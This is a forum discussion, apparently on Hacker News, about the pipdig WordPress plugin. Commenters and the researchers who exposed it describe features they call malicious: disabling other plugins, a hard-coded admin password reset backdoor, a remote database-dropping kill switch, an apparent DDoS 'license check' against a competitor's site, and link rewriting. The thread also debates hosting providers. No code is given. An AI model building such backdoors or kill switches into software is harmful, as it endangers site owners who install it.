> Another one from the @pipdig plugin. If you use one of their themes on @bluehost then they intentionally slow your website down by disabling the BlueHost cache plugin, then they can inject content with the title "Is your host slowing
you down?"
While the call to host switch is malicious, almost every developer in WordPress world will agree BlueHost, and their parent company with all their 50+ hosting companies, are utter garbage. The only reason they exist is because they have hired an army of bloggers and pay them affiliate income of $65 / signup.
As far as disabling Endurance Cache goes, it is completely legitimate. It's a plugin forced upon BlueHost users, without being told so, and is a "must-use" plugin that most users will never check (and can't be completely disabled from WordPress admin).
Wait... so if I write a WP plugin, I'm entitled to disable other plugins I don't like when people install mine? Of course not. That endurance cache is not the only one, there's a list of "plugins we disagree with" which are disabled:
As for hosting providers: GoDaddy, BlueHost, etc - yes, they're all bad. But that doesn't justify moves like these.
Serious question though, on the technical part: WP needs an advanced-cache.php file, which needs to be in wp-content in order for the cache to work; this will list as dropin.
Are you sure the endurance cache is MU and not dropin? (Genuine question).
Which is why I stated it's a tangent about BlueHost and I definitely don't agree with disabling other plugins.
However, I believe it's perfectly valid to disable a forced plugin. If a host forced enabled an almost hidden plugin, without user consent [1], then it's no more evil to undo the evil for the good of users.
As for drop-in vs mu, every other cache plugin itself stays a normal plugin so it's not a technical limitation. That's beside the point though, the plugin is force enabled without user consent.
Well... the thing with a hosted service is the host needs to protect their arses as well, and WP resource abuse can get fascinating - a mandatory cache plugin is not _that_ bad. It's not The Right Way, but shipping WP without enabled cache or a full page cache isn't either.
I actually understand this perspective, having hosted wordpress sites and having written wordpress cache plugin myself.
I'm curious which host you'd recommend. I want a good host for making websites. Not sure if I need to be a reseller or just use their shared hosting. I'm hoping to create lots of static websites for different small businesses, and then cheaply host them. Considering Namecheap, DreamHost, and BlueHost, but I'm also hoping there's one that allows nudity (not porn, just artistic nudity). Or if there's a host that allows any content, that's a plus.
I've been trying to find non-Amazon or non-Google hosting options, wanting to spend my money elsewhere. Is this a waste of time or effort? I imagine that cloud hosting with Google would be less restrictive, though more complicated to setup.
NearlyFreeSpeech.NET has strong free-speech policies. But they do expect you to be technically competent. If you're not comfortable with the command line and wp-cli (if you're using WordPress), you probably won't be happy with them.
If you checked them out years ago, they've since added support for custom HTTP servers. It's not as flexible as a VPS, but they're no longer limited to static files, PHP, or CGI. You can now run Django, Ruby-on-Rails, etc.
It's pretty much the same as if it was hardcoded, it drops all tables that have a name starting with the WP prefix. It's extremely ugly, but it's not unsafe (if your plan is removing all WP related tables from the DB).
And this just illustrates the horror that is the proprietary market place of WordPress plugins. It is annoying because this results in incentives to take away freedom from users and require payment for proprietary code in the guise of a free software project. To expand Word Press functionality beyond the core functions you have to wade through a minefield of freemium plugins that have all been slightly broken to encourage you to shell out money to someone for code you won't have any freedom with and the worst of it possibly demonstrated by code like this. I have built some sites with WordPress but I have always felt stifled by the way the plugins and themes are distributed. On the other hand I understand people like being able to charge money and create businesses from the code they right which can be more challenging if you actually write free as in libre software vs. attempting to extract money from every potential user.
For my personal site, I've left WP behind about 3 years ago. I had to go back last month, trying to build something instead of a Wix site for a school, and the experience was terrifying: after adding one of the events plugin, within 5 minutes I started getting spam registration. All plugins have ugly admin interface "extras" and are very pushy to buy them.
The WordPress of 2007, which I loved very much, has nothing to do with this monster of 2019.
I share a similar sentiment. Since about 2-3 years ago, most WordPress plugins are marketed bloatware that messes up the entire dashboard UI. And don't get me started on plugins that don't let you close their notifications unless you do "some thing".
It really is a shame, because frankly speaking - most of these plugins are utter trash anyway.
I've tried out a massive amount of gutenberg block plugins; whichever added a new line in the admin menu instead of adding it into a submenu of settings, deserves immediate deletion.
You get what you pay for with Wordpress plugins. There are some great free ones that are mainained.
Then you get ones that can't survive minor wordpress upgrades, or are full of security holes.
The worst is when you have a highly motivated person who throws a ton of them together to buid a website, and then it languishes and becomes out of date, and any upgrading you do will start culling plugins from their baby.
> And this just illustrates the horror that is the proprietary market place of WordPress plugins.
Same stories emanate from the Google Play marketplace, and to a lesser extent the highly curated Apple app store marketplace. How is WordPress any different?
> you have to wade through a minefield of freemium plugins
Just like every other app store.
> for code you won't have any freedom with
Unlike smartphone apps, or apps for my PC I can and do inspect the source code of any WordPress plugin or theme.
> I have built some sites with WordPress but I have always felt stifled by the way the plugins and themes are distributed
I'd feel the same way about platforms I've only been exposed to a few times as well.
Thanks. My crew put this write-up together. We're here if you have any questions. Jem and us published almost at the same time although I think we beat her by an hour or so. We're in contact. Funny coincidence we were working on the same story at the same time.
This has blown up on Twitter. Our team has stayed out of the online debate mostly other than answering questions. We're trying to just focus on the data here.
They took their public repo offline, but we mirrored it before they did that. It contradicts some claims they're making re timing. We're publishing a timeline tomorrow and are recording our weekly podcast tonight instead of tomorrow as per normal because of this insanity. We'll break it down on the show.
I guess what really jumps out at me here is how they're trying to gaslight the thing.
I'd also like to add that the DDoS functionality isn't what really jumped out at me. It was the ability to reset your site's admin password remotely using a hard-coded password that anyone can read. And then there is also the ability to drop all your tables.
When we contacted them before publishing via email, they explained that someone had been pirating their software so this was a countermeasure. (quote is in the Wordfence post above) I guess the idea was that they would destroy sites using pirated licenses. Then they backpedalled that later on after this went viral.
Depends who you ask. Also some sites use a SaaS model with API key for back-end access. They claimed license keys were stolen.
“Last year we had some serious problems after someone obtained a huge list of license keys and downloaded all of our products. The keys and files were then distributed on their file sharing site, which has since been taken down (not by us, ironically!). The drop tables function was put in place to try to stop this at the time.”
> Wow, peoples' responses on Twitter are even more delusional. Wtf?
I find this so baffling. It's like being shown the bodies of a serial killer's victims, and publicly stating "oh, but he never murdered me, so why are you all complaining?"
They surely do not understand they are looking at bodies. They're seeing a bunch of nerd speak about "DDoS" and "dropping database tables" and their eyes glazed over. But they understand their site looks pretty...
A percentage of the population treats something like this as a personal attack. I have Atari/Sega/Chevy thus Commodore/Nintendo/Ford sucks. I use it, why are you saying those things about X, are you calling me stupid? etc.
If I'm reading this correctly, they're essentially admitting to some of the malicious features described by the researcher, but claiming that they were included for support purposes, or as a way of sabotaging sites using pirated versions of their plugin.
1. Including features which can remotely grant unauthorized access or cause damage to a user's web site is inappropriate under any circumstances. Even if they're your customers, or if they aren't your customers, or whatever. You don't do that.
2. Pipdig hasn't come up with any sensible explanation for why their license checks were pointed at a competitor's web site. It's not even clear why the license check would be architected in a way that allowed for this.
3. Altering user's site content to change links from Blogerize to Pipdig is beyond the pale. Pipdig's explanation of this feature is incoherent; it isn't even consistent with the behavior of the code presented.
4. Obfuscating the code surrounding all of these questionable bits of functionality stinks of wrongdoing. It's understandable for a license check to be a little obfuscated, perhaps, but there's no reason why a remote administration feature should be (even if it had any reason for existing).
We're just a poor small company... that is acts maliciously against our competitors using our code we sell to clients who have no idea! we're sorry we got caught and it's hard to explain why this isn't bad.
Oh and they deleted repos apparently, gotta hide the evidence
"But all my customers love and trust me!" == "I'm just an above-average con man."
"But I was just doing this to support them without bothering them!" == "I'm clearly not ready to take responsibility and fess up to anything because I thought my deceptively named functions would fool everybody (and still do)."
"But my girlfriend and I love cat memes!" == "Please, for the love of god, can we forget about all this and talk about cat memes instead?" [I honestly have no clue what he was trying to get at in the first six paragraphs...]
It sounds like they got a little overaggressive fighting with the company that had hijacked their themes and were selling them last year.
They were probably obfuscating those functions to hide them from the people selling their themes. Sounds like they were also disabling this plugin as well.
But they definitely went about things the wrong way, including functions like that and obfuscating them is definitely not the right way to do things.
I think a simple, we're sorry we had included these functions in this manner to combat the company stealing our themes last year. We understand this was wrong and a fresh clean version of the plugin will be out this week.
We will do things the right way from now on, you can trust us and we welcome audits of all our code.
> Firstly, the plugin includes a content filter that automatically replaces references to Blogerize, a service which claims to be a beginner’s blogging course, with references to Pipdig’s own services.
Generally speaking, most WordPress plugins alter the presentation or functionality of a site, not its content. There's some exceptions, like search-and-replace [1], but even in those cases the functionality is made obvious to the user.
> Phil you need to stop with the lies. Not only do you outright lie about having the ability to kill sites with your plugin, you state that this was implemented in response to a security breach you experienced in July 2018. The code was implemented in November 2017.
It looks like the company involved is based in the U.K. and also seems likely this software and their usage of it is a violation of the Computer Misuse Act.
One of their competitors should consider filing a complaint with the relevant authorities, so this gets formally investigated.
Yes, absolutely. The responses so far have been too tepid; DDOSing competitors, adding a database-dropping kill switch, disabling other software, and adding an admin login backdoor are all separate criminal offenses. The developer responsible should not just be blacklisted, he should be in prison.
I would be interested to hear from CloudFlare as to whether there is any possibility of confirming that the URL "https://pipdigz.co.uk/p3/id39dqm3c0_license_h.txt" - fetched by the "license check" code - did at some point return the text "https://kotrynabassdesign.com/wp-admin/admin-ajax.php". I suspect this will be difficult, or impossible, to verify (I'm not a security expert) and the "license check" code in and of itself (while extremely fishy) only betrays the potential of a DDoS and is not a smoking gun.
Hopefully not. Cloudflare has no business in law enforcement or legal investigations. If they are trustworthy, this will not know about the contents of sites in the past.
tons of wordpress themes and plugin are complete crap - even popular stuff. nobody reads the code or knows how to read it. it makes claiming bug bounties on wordpress sites easy.
There are many solutions out there that can generate static sites from a WordPress installation. For example, you can use gatsby.js to generate a static site using WordPress as data source.
My point if if you want wordpress ecosystem but don't want the associated risk, there are many ways to generate static websites from a wordpress installation. You can run wordpress locally in your local development computer and only host the generated static html in your server/hosting provider.
Their reply is an exercise in basic obfuscation and dissembling. Instead of explaining the specific 'features' of their code, their response is in a question-and-answer format. They chose the questions, and they are sufficiently broad and otherwise carefully chosen so that they can avoid being specific about what, exactly, they were up to. Some obvious follow-up questions to their initial answers are conspicuously absent.
Being able to drop someone else's full site contents is not something anyone should get away with under any circumstance.
The want to prevent pirated theme - reset the theme to twentysexteen; block frontend access; overlay frontend with notification, etc - so many options. Deleting data? That is not one of them.
I won't even get into the deliberate other plugins disabling with comments like "sorry not sorry", including cache plugins to advertise their own hosting.
> There was function in an older version of the plugin which could be used to reset a site back to the default settings. This function had no risk of of malicious or unintentional use.
> The portrayal of this feature is not based on reality. There is a function in the plugin which can be used to clear database tables, much like a backup or standard reset plugin. To confirm, we do not have the ability to “kill” a site, nor would we ever, ever want to do that! The function is in place to reset a site back to defaults, however it is only activated after being in touch with the site owner.
It dropped all wordpress tables. This is not a reset. There's also no reason to only have PipDig able to do this via their server, vs. an option in the configuration.
They also don't address the password reset functionality.
At best, these people are incompetent and don't realize the power their code wields. At worst, they're just backpedaling and trying to mitigate damage. (I especially like their attempt to humanize themselves by saying they're just four people who like cat memes.)
https://twitter.com/nickstadb/status/1112479746972151808
pipdig is a goldmine.